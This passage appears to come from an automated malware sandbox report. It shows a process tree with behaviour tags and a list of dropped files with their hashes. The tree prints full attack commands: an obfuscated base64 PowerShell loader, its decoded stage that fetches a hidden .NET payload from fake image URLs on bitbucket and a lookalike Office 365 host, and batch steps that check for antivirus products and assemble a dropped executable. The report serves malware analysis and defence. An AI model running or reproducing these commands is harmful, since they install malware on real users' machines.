                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@GI@awBt@EE@awBt@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3728
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                            7⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3892
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10338770101\7IIl2eE.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10338770101\7IIl2eE.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Drops file in Windows directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3280
                                                                                                    • C:\Windows\SysWOW64\CMD.exe
                                                                                                      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                      4⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3860
                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                        tasklist
                                                                                                        5⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3760
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr /I "opssvc wrsa"
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1828
                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                        tasklist
                                                                                                        5⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4076
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2236
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c md 418377
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1472
                                                                                                      • C:\Windows\SysWOW64\extrac32.exe
                                                                                                        extrac32 /Y /E Leon.cab
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3408
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr /V "BEVERAGES" Compilation
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1540
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1284
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3300
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                                        Passwords.com N
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:3292
                                                                                                      • C:\Windows\SysWOW64\choice.exe
                                                                                                        choice /d y /t 5
                                                                                                        5⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3560
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10338780101\f73ae_003.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10338780101\f73ae_003.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3448
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10338790101\bd9c4316f2.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10338790101\bd9c4316f2.exe"
                                                                                                    3⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:3436
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10338790101\bd9c4316f2.exe"
                                                                                                      4⤵
                                                                                                      • Downloads MZ/PE file
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4004
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10338800101\4ad709baae.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10338800101\4ad709baae.exe"
                                                                                                    3⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:1244
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10338800101\4ad709baae.exe"
                                                                                                      4⤵
                                                                                                      • Downloads MZ/PE file
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:696
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10338810101\ce9f45fe52.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10338810101\ce9f45fe52.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2936
                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                      C:\Windows\system32\WerFault.exe -u -p 2936 -s 64
                                                                                                      4⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:3396
                                                                                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                1⤵
                                                                                                  PID:1932
                                                                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                  1⤵
                                                                                                    PID:2168
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "18151894921770495853-248799738-851822833-1456512355933829621-417146841-1968934105"
                                                                                                    1⤵
                                                                                                      PID:3784

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • C:\ProgramData\HDGCAAFBFBKFIDGDHJDB

                                                                                                      Filesize

                                                                                                      6KB

                                                                                                      MD5

                                                                                                      15b193d5b0b8310df1f61bab01261988

                                                                                                      SHA1

                                                                                                      33b9db751729234cf45ff3849ebfa4faeeaa4bcc

                                                                                                      SHA256

                                                                                                      a3dba75d9b9f8c8c77bd79f1f8bb6e86c8abb031a1f2a600a03b0fb7b53fd72a

                                                                                                      SHA512

                                                                                                      4e28e97b36bc09321935339d78b6ccf9c8c875c4fb6d586407a76111f25232deabc9d93e63b5aedc23cd94feb4510c5dd1538f3d1dac966ff8f76e3884948ec7

                                                                                                    • C:\Temp\V5GxwI9zX.hta

                                                                                                      Filesize

                                                                                                      779B

                                                                                                      MD5

                                                                                                      39c8cd50176057af3728802964f92d49

                                                                                                      SHA1

                                                                                                      68fc10a10997d7ad00142fc0de393fe3500c8017

                                                                                                      SHA256

                                                                                                      f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                                                                      SHA512

                                                                                                      cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                      Filesize

                                                                                                      40B

                                                                                                      MD5

                                                                                                      1d6994c9e7456e30a9c2dcecdc184047

                                                                                                      SHA1

                                                                                                      ad85ecf6f00da14dbde2b4b22e52809a02ad11cb

                                                                                                      SHA256

                                                                                                      32d641a0b1a4d012ac26b4511e84b1ce3a0c129fccd4e85a78a31d46b14f1a8d

                                                                                                      SHA512

                                                                                                      45820fc375361f0518efc53e283a5421a58ace75b2d4d94c9a190ac75a3b3717b9b797e8d27cec3014fcc9e9ea27f2ffc586777d8d658e0e24d379fe7604c607

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp

                                                                                                      Filesize

                                                                                                      16B

                                                                                                      MD5

                                                                                                      18e723571b00fb1694a3bad6c78e4054

                                                                                                      SHA1

                                                                                                      afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                                      SHA256

                                                                                                      8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                                      SHA512

                                                                                                      43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\000004.dbtmp

                                                                                                      Filesize

                                                                                                      16B

                                                                                                      MD5

                                                                                                      6752a1d65b201c13b62ea44016eb221f

                                                                                                      SHA1

                                                                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                      SHA256

                                                                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                      SHA512

                                                                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\MANIFEST-000001

                                                                                                      Filesize

                                                                                                      41B

                                                                                                      MD5

                                                                                                      5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                      SHA1

                                                                                                      d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                      SHA256

                                                                                                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                      SHA512

                                                                                                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\000002.dbtmp

                                                                                                      Filesize

                                                                                                      16B

                                                                                                      MD5

                                                                                                      206702161f94c5cd39fadd03f4014d98

                                                                                                      SHA1

                                                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                      SHA256

                                                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                      SHA512

                                                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\CURRENT

                                                                                                      Filesize

                                                                                                      16B

                                                                                                      MD5

                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                      SHA1

                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                      SHA256

                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                      SHA512

                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\e337105e-b0b9-467e-8d58-67f1d94fa33b.tmp

                                                                                                      Filesize

                                                                                                      2B

                                                                                                      MD5

                                                                                                      99914b932bd37a50b983c5e7c90ae93b

                                                                                                      SHA1

                                                                                                      bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                      SHA256

                                                                                                      44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                      SHA512

                                                                                                      27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D6V88JEY\soft[1]

                                                                                                      Filesize

                                                                                                      3.0MB

                                                                                                      MD5

                                                                                                      fc1e4df340c9005e05b8bfc96cec9e09

                                                                                                      SHA1

                                                                                                      b443e9d3d0e35f97db505025d130ccb6646cd437

                                                                                                      SHA256

                                                                                                      0c68affa8190af92aac6b35099f3e67659c42f6bc854a7d764a3a448eff2cb51

                                                                                                      SHA512

                                                                                                      3a1cb04272ae35edbcae5211c02eca15735f63dfe0491158aee0565f226277810923b1f1cfca30dd594d926466628315454af466230f02d0b0f5d181fa3f2101

                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\service[1].htm

                                                                                                      Filesize

                                                                                                      1B

                                                                                                      MD5

                                                                                                      cfcd208495d565ef66e7dff9f98764da

                                                                                                      SHA1

                                                                                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                      SHA256

                                                                                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                      SHA512

                                                                                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                      Filesize

                                                                                                      29KB

                                                                                                      MD5

                                                                                                      24a6b2163d2aa18b432d88de768fcc5b

                                                                                                      SHA1

                                                                                                      3888d454fe7bd602c83bc63e4bdda75414ba57d0

                                                                                                      SHA256

                                                                                                      c3d0428819301855fb23b363702af3b24b32bb8a8e5391106650ed786a638d37

                                                                                                      SHA512

                                                                                                      d894dcdd1e23200ec290944255ef789c8dd979fca901b8902b223f978392f18a9f8a251e83feda3ccb04e5200bc7c55d2076f08419c9ee20aa55be74c054146e

                                                                                                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                      Filesize

                                                                                                      15KB

                                                                                                      MD5

                                                                                                      96c542dec016d9ec1ecc4dddfcbaac66

                                                                                                      SHA1

                                                                                                      6199f7648bb744efa58acf7b96fee85d938389e4

                                                                                                      SHA256

                                                                                                      7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                                                                      SHA512

                                                                                                      cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

